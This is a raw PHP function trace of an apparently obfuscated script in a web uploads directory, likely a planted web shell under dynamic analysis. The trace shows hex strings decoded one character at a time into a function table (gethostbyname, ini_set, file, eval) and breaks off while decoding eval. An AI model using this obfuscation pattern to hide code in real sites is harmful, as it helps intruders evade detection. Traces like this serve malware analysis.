2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 21
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	792	0	0.030686	721240	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	792	1	0.030698	721288
3	792	R			103
3	793	0	0.030710	721208	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	793	1	0.030721	721248
3	793	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	794	0	0.030752	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	794	1	0.030763	721320
3	794	R			101
3	795	0	0.030775	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	795	1	0.030787	721280
3	795	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	796	0	0.030817	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	796	1	0.030827	721320
3	796	R			116
3	797	0	0.030840	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	797	1	0.030851	721280
3	797	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	798	0	0.030880	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	798	1	0.030891	721320
3	798	R			104
3	799	0	0.030903	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	799	1	0.030914	721280
3	799	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	800	0	0.030944	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	800	1	0.030955	721320
3	800	R			111
3	801	0	0.030967	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	801	1	0.030978	721280
3	801	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	802	0	0.031008	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	802	1	0.031020	721320
3	802	R			115
3	803	0	0.031032	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	803	1	0.031044	721280
3	803	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	804	0	0.031074	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	804	1	0.031085	721320
3	804	R			116
3	805	0	0.031097	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	805	1	0.031108	721280
3	805	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	806	0	0.031138	721272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	806	1	0.031149	721320
3	806	R			110
3	807	0	0.031162	721240	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	807	1	0.031173	721280
3	807	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	808	0	0.031204	721280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	808	1	0.031215	721328
3	808	R			97
3	809	0	0.031228	721248	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	809	1	0.031243	721288
3	809	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	810	0	0.031273	721280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	810	1	0.031285	721328
3	810	R			109
3	811	0	0.031296	721248	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	811	1	0.031307	721288
3	811	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	812	0	0.031337	721280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	812	1	0.031349	721328
3	812	R			101
3	813	0	0.031361	721248	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	813	1	0.031372	721288
3	813	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	791	1	0.031402	721248
2	791	R			'gethostname'
1		A						/var/www/html/uploads/1CTT.php	7	$func[39] = 'gethostname'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	814	0	0.031437	721248	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'676574686f737462796e616d65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 25
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	815	0	0.031479	721280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	815	1	0.031491	721328
3	815	R			103
3	816	0	0.031503	721248	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	816	1	0.031515	721288
3	816	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	817	0	0.031546	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	817	1	0.031558	721360
3	817	R			101
3	818	0	0.031570	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	818	1	0.031581	721320
3	818	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	819	0	0.031611	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	819	1	0.031623	721360
3	819	R			116
3	820	0	0.031635	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	820	1	0.031647	721320
3	820	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	821	0	0.031677	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	821	1	0.031689	721360
3	821	R			104
3	822	0	0.031701	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	822	1	0.031712	721320
3	822	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	823	0	0.031741	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	823	1	0.031753	721360
3	823	R			111
3	824	0	0.031765	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	824	1	0.031776	721320
3	824	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	825	0	0.031807	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	825	1	0.031818	721360
3	825	R			115
3	826	0	0.031830	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	826	1	0.031842	721320
3	826	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	827	0	0.031871	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	827	1	0.031883	721360
3	827	R			116
3	828	0	0.031895	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	828	1	0.031906	721320
3	828	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	829	0	0.031939	721312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	829	1	0.031953	721360
3	829	R			98
3	830	0	0.031969	721280	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	830	1	0.031991	721320
3	830	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	831	0	0.032024	721320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	831	1	0.032035	721368
3	831	R			121
3	832	0	0.032047	721288	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	832	1	0.032058	721328
3	832	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	833	0	0.032088	721320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	833	1	0.032099	721368
3	833	R			110
3	834	0	0.032112	721288	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	834	1	0.032122	721328
3	834	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	835	0	0.032152	721320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	835	1	0.032164	721368
3	835	R			97
3	836	0	0.032177	721288	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	836	1	0.032188	721328
3	836	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	837	0	0.032217	721320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	837	1	0.032229	721368
3	837	R			109
3	838	0	0.032241	721288	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	838	1	0.032253	721328
3	838	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	839	0	0.032282	721320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	839	1	0.032293	721368
3	839	R			101
3	840	0	0.032305	721288	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	840	1	0.032317	721328
3	840	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	814	1	0.032347	721288
2	814	R			'gethostbyname'
1		A						/var/www/html/uploads/1CTT.php	7	$func[40] = 'gethostbyname'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	841	0	0.032382	721288	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'737562737472'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	842	0	0.032422	721320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	842	1	0.032434	721368
3	842	R			115
3	843	0	0.032446	721288	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	843	1	0.032458	721328
3	843	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	844	0	0.032488	721352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	844	1	0.032500	721400
3	844	R			117
3	845	0	0.032512	721320	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	845	1	0.032523	721360
3	845	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	846	0	0.032553	721352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	846	1	0.032565	721400
3	846	R			98
3	847	0	0.032577	721320	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	847	1	0.032588	721360
3	847	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	848	0	0.032618	721352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	848	1	0.032629	721400
3	848	R			115
3	849	0	0.032641	721320	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	849	1	0.032652	721360
3	849	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	850	0	0.032683	721352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	850	1	0.032697	721400
3	850	R			116
3	851	0	0.032710	721320	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	851	1	0.032721	721360
3	851	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	852	0	0.032751	721352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	852	1	0.032762	721400
3	852	R			114
3	853	0	0.032774	721320	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	853	1	0.032785	721360
3	853	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	841	1	0.032815	721320
2	841	R			'substr'
1		A						/var/www/html/uploads/1CTT.php	7	$func[41] = 'substr'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	854	0	0.032848	721320	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'737472737472'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	855	0	0.032887	721352	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	855	1	0.032899	721400
3	855	R			115
3	856	0	0.032912	721320	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	856	1	0.032923	721360
3	856	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	857	0	0.032953	721384	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	857	1	0.032964	721432
3	857	R			116
3	858	0	0.032977	721352	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	858	1	0.032988	721392
3	858	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	859	0	0.033018	721384	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	859	1	0.033029	721432
3	859	R			114
3	860	0	0.033041	721352	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	860	1	0.033052	721392
3	860	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	861	0	0.033082	721384	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	861	1	0.033094	721432
3	861	R			115
3	862	0	0.033106	721352	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	862	1	0.033117	721392
3	862	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	863	0	0.033146	721384	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	863	1	0.033158	721432
3	863	R			116
3	864	0	0.033170	721352	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	864	1	0.033181	721392
3	864	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	865	0	0.033211	721384	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	865	1	0.033223	721432
3	865	R			114
3	866	0	0.033235	721352	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	866	1	0.033246	721392
3	866	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	854	1	0.033276	721352
2	854	R			'strstr'
1		A						/var/www/html/uploads/1CTT.php	7	$func[42] = 'strstr'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	867	0	0.033309	721352	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'696e695f736574'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	868	0	0.033349	721384	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	868	1	0.033360	721432
3	868	R			105
3	869	0	0.033373	721352	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	869	1	0.033384	721392
3	869	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	870	0	0.033419	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	870	1	0.033430	721464
3	870	R			110
3	871	0	0.033443	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	871	1	0.033454	721424
3	871	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	872	0	0.033484	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	872	1	0.033495	721464
3	872	R			105
3	873	0	0.033508	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	873	1	0.033519	721424
3	873	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	874	0	0.033549	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	874	1	0.033561	721464
3	874	R			95
3	875	0	0.033573	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	875	1	0.033583	721424
3	875	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	876	0	0.033613	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	876	1	0.033625	721464
3	876	R			115
3	877	0	0.033637	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	877	1	0.033648	721424
3	877	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	878	0	0.033678	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	878	1	0.033689	721464
3	878	R			101
3	879	0	0.033701	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	879	1	0.033713	721424
3	879	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	880	0	0.033742	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	880	1	0.033753	721464
3	880	R			116
3	881	0	0.033765	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	881	1	0.033776	721424
3	881	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	867	1	0.033806	721384
2	867	R			'ini_set'
1		A						/var/www/html/uploads/1CTT.php	7	$func[43] = 'ini_set'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	882	0	0.033839	721384	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	883	0	0.033880	721416	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	883	1	0.033891	721464
3	883	R			102
3	884	0	0.033904	721384	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	884	1	0.033915	721424
3	884	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	885	0	0.033945	721448	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	885	1	0.033956	721496
3	885	R			105
3	886	0	0.033968	721416	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	886	1	0.033979	721456
3	886	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	887	0	0.034009	721448	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	887	1	0.034020	721496
3	887	R			108
3	888	0	0.034033	721416	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	888	1	0.034044	721456
3	888	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	889	0	0.034074	721448	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	889	1	0.034085	721496
3	889	R			101
3	890	0	0.034098	721416	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	890	1	0.034108	721456
3	890	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	882	1	0.034142	721416
2	882	R			'file'
1		A						/var/www/html/uploads/1CTT.php	7	$func[44] = 'file'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	891	0	0.034175	721416	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7374725f7265706c616365'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 21
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	892	0	0.034216	721448	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	892	1	0.034228	721496
3	892	R			115
3	893	0	0.034240	721416	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	893	1	0.034252	721456
3	893	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	894	0	0.034282	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	894	1	0.034294	721528
3	894	R			116
3	895	0	0.034306	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	895	1	0.034318	721488
3	895	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	896	0	0.034348	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	896	1	0.034359	721528
3	896	R			114
3	897	0	0.034371	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	897	1	0.034382	721488
3	897	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	898	0	0.034412	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	898	1	0.034423	721528
3	898	R			95
3	899	0	0.034435	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	899	1	0.034446	721488
3	899	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	900	0	0.034476	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	900	1	0.034487	721528
3	900	R			114
3	901	0	0.034499	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	901	1	0.034511	721488
3	901	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	902	0	0.034540	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	902	1	0.034551	721528
3	902	R			101
3	903	0	0.034563	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	903	1	0.034575	721488
3	903	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	904	0	0.034605	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	904	1	0.034624	721528
3	904	R			112
3	905	0	0.034638	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	905	1	0.034649	721488
3	905	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	906	0	0.034680	721480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	906	1	0.034691	721528
3	906	R			108
3	907	0	0.034704	721448	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	907	1	0.034715	721488
3	907	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	908	0	0.034744	721488	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	908	1	0.034755	721536
3	908	R			97
3	909	0	0.034767	721456	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	909	1	0.034778	721496
3	909	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	910	0	0.034808	721488	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	910	1	0.034819	721536
3	910	R			99
3	911	0	0.034831	721456	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	911	1	0.034841	721496
3	911	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	912	0	0.034875	721488	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	912	1	0.034887	721536
3	912	R			101
3	913	0	0.034899	721456	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	913	1	0.034910	721496
3	913	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	891	1	0.034940	721456
2	891	R			'str_replace'
1		A						/var/www/html/uploads/1CTT.php	7	$func[45] = 'str_replace'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	914	0	0.034975	721456	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6578706c6f6465'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	915	0	0.035016	721488	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	915	1	0.035027	721536
3	915	R			101
3	916	0	0.035039	721456	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	916	1	0.035050	721496
3	916	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	917	0	0.035081	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	917	1	0.035092	721568
3	917	R			120
3	918	0	0.035104	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	918	1	0.035115	721528
3	918	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	919	0	0.035145	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	919	1	0.035157	721568
3	919	R			112
3	920	0	0.035169	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	920	1	0.035180	721528
3	920	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	921	0	0.035210	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	921	1	0.035222	721568
3	921	R			108
3	922	0	0.035235	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	922	1	0.035246	721528
3	922	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	923	0	0.035276	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	923	1	0.035287	721568
3	923	R			111
3	924	0	0.035299	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	924	1	0.035310	721528
3	924	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	925	0	0.035340	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	925	1	0.035351	721568
3	925	R			100
3	926	0	0.035363	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	926	1	0.035375	721528
3	926	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	927	0	0.035404	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	927	1	0.035415	721568
3	927	R			101
3	928	0	0.035427	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	928	1	0.035438	721528
3	928	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	914	1	0.035468	721488
2	914	R			'explode'
1		A						/var/www/html/uploads/1CTT.php	7	$func[46] = 'explode'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	929	0	0.035502	721488	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6576616c'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	930	0	0.035542	721520	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	930	1	0.035553	721568
3	930	R			101
3	931	0	0.035566	721488	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	931	1	0.035582	721528
